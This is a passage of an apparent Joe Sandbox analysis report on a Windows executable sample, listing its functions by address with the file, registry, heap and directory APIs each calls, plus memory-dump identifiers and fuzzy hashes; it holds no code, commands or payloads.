                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00812BF0 Relevance: 3.1, APIs: 2, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___std_fs_directory_iterator_open@12.LIBCPMT ref: 00812C5F
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00812C73
                                      • Part of subcall function 008560E6: FindNextFileW.KERNELBASE(?,?,?,00812C78,?,?,?,?,?,?,?,?,00000000), ref: 008560EF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8___std_fs_directory_iterator_open@12
                                    • String ID:
                                    • API String ID: 1204997319-0
                                    • Opcode ID: 99877d698182166deb419799ead99abf6194e22d22000aa6567a567e1e7e8f51
                                    • Instruction ID: 5036da0eac141fb22a9ac82838f5a8a009c62ef7c85540f9d574b4f4441210bf
                                    • Opcode Fuzzy Hash: 99877d698182166deb419799ead99abf6194e22d22000aa6567a567e1e7e8f51
                                    • Instruction Fuzzy Hash: ED212131610618ABDF24AF98D981ADE77B8FF08354F004019FA02E7281E770DAE49BD1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082BB72 Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,00000000), ref: 0082BBCB
                                    • RegGetValueA.KERNELBASE(?,00000000,?,00000002,00000000,00000000,00000100,?,?,00000000,00020019,?,?,?,00000000), ref: 0082BBF1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: OpenValue
                                    • String ID:
                                    • API String ID: 3130442925-0
                                    • Opcode ID: 71322513550732e4c8f7d06bb8929f1c78dc375ab802e631ba8c1f45c01aaf1b
                                    • Instruction ID: 7cd5999987ebb8ef9c4c02f067e2f0f7efec2dca93101eb9240d735081c49588
                                    • Opcode Fuzzy Hash: 71322513550732e4c8f7d06bb8929f1c78dc375ab802e631ba8c1f45c01aaf1b
                                    • Instruction Fuzzy Hash: 6D218E71600219AFEB14EF58DC82FAEB7B8FB88705F104529F502E6281DBB49984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081799D Relevance: 3.0, APIs: 2, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008179E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: bdce16adb3c0a89c8d2cd249cd3e04a08911475d18e71584c429e8d34a5992bd
                                    • Instruction ID: 807e2fef587cf191a6cf40698f52cf4efe76cbc408a412827e91bbb4fe8babff
                                    • Opcode Fuzzy Hash: bdce16adb3c0a89c8d2cd249cd3e04a08911475d18e71584c429e8d34a5992bd
                                    • Instruction Fuzzy Hash: 9E018F71608B54AEF3219B388C44BBABAECFF18314F10493EF696D3251E7B49D849710
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00856087 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00856094
                                    • GetLastError.KERNEL32 ref: 008560A7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast
                                    • String ID:
                                    • API String ID: 1375471231-0
                                    • Opcode ID: 4e256dbb61125e67eab0fbec2837bbb93ebf6a5909ad638783b2d6387e22ae9c
                                    • Instruction ID: ba188b0b5180c045b557df7b761363aaadac8edb4a1cf7df81e3f3eba6270a11
                                    • Opcode Fuzzy Hash: 4e256dbb61125e67eab0fbec2837bbb93ebf6a5909ad638783b2d6387e22ae9c
                                    • Instruction Fuzzy Hash: B4F0F630B0452CABDB115A58CD80ADE7ABDFB54359F148161EC00F32D0EB71DC568391
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083311B Relevance: 3.0, APIs: 2, Instructions: 27sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000064), ref: 00833131
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 0083313A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotificationSleep
                                    • String ID:
                                    • API String ID: 1821831730-0
                                    • Opcode ID: c6beb2a4611bf8ef777ad7f57d0f6262b31cec1042505dc4a7daea75c6bccf6a
                                    • Instruction ID: bf4b4cc9ab63a193d4ce3cae308a4bfd4be6248e707e921894dd564036124621
                                    • Opcode Fuzzy Hash: c6beb2a4611bf8ef777ad7f57d0f6262b31cec1042505dc4a7daea75c6bccf6a
                                    • Instruction Fuzzy Hash: 46E0263A708616A7DB08165A9C1167FB7A7FFC5770F14803AF606C6440CA71D80283D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00812F83 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00812F8F
                                      • Part of subcall function 008560E6: FindNextFileW.KERNELBASE(?,?,?,00812C78,?,?,?,?,?,?,?,?,00000000), ref: 008560EF
                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 00812FA1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                    • String ID:
                                    • API String ID: 478157137-0
                                    • Opcode ID: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                    • Instruction ID: 8d62abfb4a53b8714f2fe25881caad8fb7980755af03058e1b233fd8304425d3
                                    • Opcode Fuzzy Hash: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
                                    • Instruction Fuzzy Hash: 4BE04F311045056A6F206A16D9018EA7B7EFEA1354F808020FC05D7691EB31ECF69691
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084BE05 Relevance: 1.7, APIs: 1, Instructions: 224COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008308C1: EnterCriticalSection.KERNEL32(?,00000000,?,008304FE,008B4914,00830630,00000007,?,?,?,?,00830374,?), ref: 008308C9
                                      • Part of subcall function 008308C1: GetCurrentThreadId.KERNEL32 ref: 008308CF
                                    • _strlen.LIBCMT ref: 0084C011
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalCurrentEnterSectionThread_strlen
                                    • String ID:
                                    • API String ID: 1501162294-0
                                    • Opcode ID: 0f780dda07a38bfec4580c693f1e24cb2fbd054417ec968962539f088453741c
                                    • Instruction ID: de049e5aaf2f02a62d174ae1491af8ce4225206da36db04d5c79c9e81355a610
                                    • Opcode Fuzzy Hash: 0f780dda07a38bfec4580c693f1e24cb2fbd054417ec968962539f088453741c
                                    • Instruction Fuzzy Hash: 47718F3290021DEBCF259FA9C881AAEB7B4FF54321F108129F914EB241EB35DE458F91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00818E25 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: e1449d06576bedc50f00c073a7dce894b19f0da941a0cb6019d16aba4428563a
                                    • Instruction ID: 09f7d3961a220b88eca6999dde0cafaba25df46d6a608e898fd4fc764088e1fd
                                    • Opcode Fuzzy Hash: e1449d06576bedc50f00c073a7dce894b19f0da941a0cb6019d16aba4428563a
                                    • Instruction Fuzzy Hash: C021B671945308DECB10EF9CD9426EEBBB5FF44700F50042EF506E3642DBB59A458B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081137E Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::exception::exception.LIBCONCRT ref: 00811424
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception
                                    • String ID:
                                    • API String ID: 2807920213-0
                                    • Opcode ID: 10296e163eec2c0bdab8b63304daaf4dc3b3ef8c2b2366921685a18cafddb3c7
                                    • Instruction ID: f9ce42bd7438140e7f1207562767da17f1c9809066f5dc0735d5639fb5ec994a
                                    • Opcode Fuzzy Hash: 10296e163eec2c0bdab8b63304daaf4dc3b3ef8c2b2366921685a18cafddb3c7
                                    • Instruction Fuzzy Hash: B4310671900218DFCF14EFA8D895AEDBBB8FF58311F04441AE516A7241DBB4AA85CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082F518 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Deallocate
                                    • String ID:
                                    • API String ID: 1075933841-0
                                    • Opcode ID: b061b58eb894dd9070397416b37e24aee022991a977f9200b92c4a6c8315b3eb
                                    • Instruction ID: e624ea7e117026e87e6f1c41964c3f69f6593945c7b555a370805a8cce49561e
                                    • Opcode Fuzzy Hash: b061b58eb894dd9070397416b37e24aee022991a977f9200b92c4a6c8315b3eb
                                    • Instruction Fuzzy Hash: 41119DB1904354ABCB14DF6C988099EBBBAFF85308B2444B9E914DB303D631DA02CBB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00817B49 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadFile.KERNELBASE(00000000,?,?,?,00000000), ref: 00817BB4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID:
                                    • API String ID: 2738559852-0
                                    • Opcode ID: cd05153d8c74395cf4067bbc9e68c969b4f2c0ee9748e305e36168d2f7fbfcd6
                                    • Instruction ID: 3a611868b7144a397628f2c6f69400b605e882024d9bf92b7bbccafdf34e2c6f
                                    • Opcode Fuzzy Hash: cd05153d8c74395cf4067bbc9e68c969b4f2c0ee9748e305e36168d2f7fbfcd6
                                    • Instruction Fuzzy Hash: 6C114631608515BFDB059F29C804A9ABBB9FF04764F108129F869D7610DB30EEA0DBE0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0082FF77 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::exception::exception.LIBCMT ref: 0081128D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception
                                    • String ID:
                                    • API String ID: 2807920213-0
                                    • Opcode ID: 06d311883525ecd54567ee21e71677ff8c03abcb96b84d94013c027c8513b1b9
                                    • Instruction ID: 3d48dd86f3039a80ec59c4e63c3ce0ea5b9fc81a5ace547323f2af92b13a7c20
                                    • Opcode Fuzzy Hash: 06d311883525ecd54567ee21e71677ff8c03abcb96b84d94013c027c8513b1b9
                                    • Instruction Fuzzy Hash: 0FF0F47290421C67CB18BBADA80ACDEBBACFE007547404529FA1CD7642EB31EA05C6D6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00880C90 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 481ab0115a8425f872798fda06fde6294b8049821275fe2cea251a589d171742
                                    • Instruction ID: a9ec78a66afaae261ae15a9659b5fd606c1b49d2c950b3cd0dc9e615515b61d2
                                    • Opcode Fuzzy Hash: 481ab0115a8425f872798fda06fde6294b8049821275fe2cea251a589d171742
                                    • Instruction Fuzzy Hash: 4D112A71A0420AAFCF05DF58E94199B7BF9FF48304F154069F809EB251D630EE15CB65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00888DE8 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008800C6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0088063D,00000001,00000364,00000006,000000FF,?,?,00873CA9,00880149,?,?,0087DA9C), ref: 00880107
                                    • _free.LIBCMT ref: 00888E57
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 9985f2f49b1aef7d1d8c4e4055418a624b44421da409441a5f9cdc4e5e3baad4
                                    • Instruction ID: ddddb2f9956fdba89c17604c3ba5545072c315eb032c3086dc106fc70918a1c7
                                    • Opcode Fuzzy Hash: 9985f2f49b1aef7d1d8c4e4055418a624b44421da409441a5f9cdc4e5e3baad4
                                    • Instruction Fuzzy Hash: B2016D73600316ABC330DF58C88199AFB98FB057B0F500629E545F76C0E7706C10CBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087314E Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ea0d0b683f6ca808986f240aa8770c14cdd9a68c71d72e2e2707908aa8c18fee
                                    • Instruction ID: a920dbfb9b7f5c69944cfb79e622ac32ddb2f5d70d89c8fe9ca775e215313d44
                                    • Opcode Fuzzy Hash: ea0d0b683f6ca808986f240aa8770c14cdd9a68c71d72e2e2707908aa8c18fee
                                    • Instruction Fuzzy Hash: 2EF028329016146ADA21763DDC09B5A339CFF81334F148715F86CE25C5CE34DA06A7B3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00870EF8 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,00811283,?,?,?,00811283,?,008B0524), ref: 00870F58
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DispatcherExceptionUser
                                    • String ID:
                                    • API String ID: 6842923-0
                                    • Opcode ID: dca4f7c636ba48937c41d4c630cd3874944ecedb202fcca0857649b6e093649e
                                    • Instruction ID: 04a3d9c973a199025ad17325ac29cfd2cec318c7e6794d95e59c6ef971589ec1
                                    • Opcode Fuzzy Hash: dca4f7c636ba48937c41d4c630cd3874944ecedb202fcca0857649b6e093649e
                                    • Instruction Fuzzy Hash: 7C01A235910208ABDB119F58D880BAEFBB8FF44710F15805AED09AB390EB70ED01CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088C3EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 3424ef0dd2ce1bde8dea075497d51b1d46308ef78cac1f5770f4d2f4396a2e75
                                    • Instruction ID: 7e325a91f43b106332a6ef79bfce77f4a23eff92d9e3c497af468db5d08dea94
                                    • Opcode Fuzzy Hash: 3424ef0dd2ce1bde8dea075497d51b1d46308ef78cac1f5770f4d2f4396a2e75
                                    • Instruction Fuzzy Hash: 6401E872C01159AFCF01AFA88C029EE7FB5FB08310F144565F964E21A5E6318A649BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008800C6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0088063D,00000001,00000364,00000006,000000FF,?,?,00873CA9,00880149,?,?,0087DA9C), ref: 00880107
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: dd1a48328a935874b2d0ae6a7cff1a00cb3f254fc786d16ec5b0e89c7a28b83a
                                    • Instruction ID: f5749ad22e8cecb22fd285ea8651ac74fa8091932f4fda44570155c438ba8a86
                                    • Opcode Fuzzy Hash: dd1a48328a935874b2d0ae6a7cff1a00cb3f254fc786d16ec5b0e89c7a28b83a
                                    • Instruction Fuzzy Hash: EEF05931104A2C669B717A369C07B5A3748FF82770F049121BC08E62C5CB20DC08DBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0086DC67 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • std::exception::exception.LIBCMT ref: 0081128D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception
                                    • String ID:
                                    • API String ID: 2807920213-0
                                    • Opcode ID: ef38e82b5db20dd9a77e076603fe5bee168e3f549ca89412a6356b250ab393a9
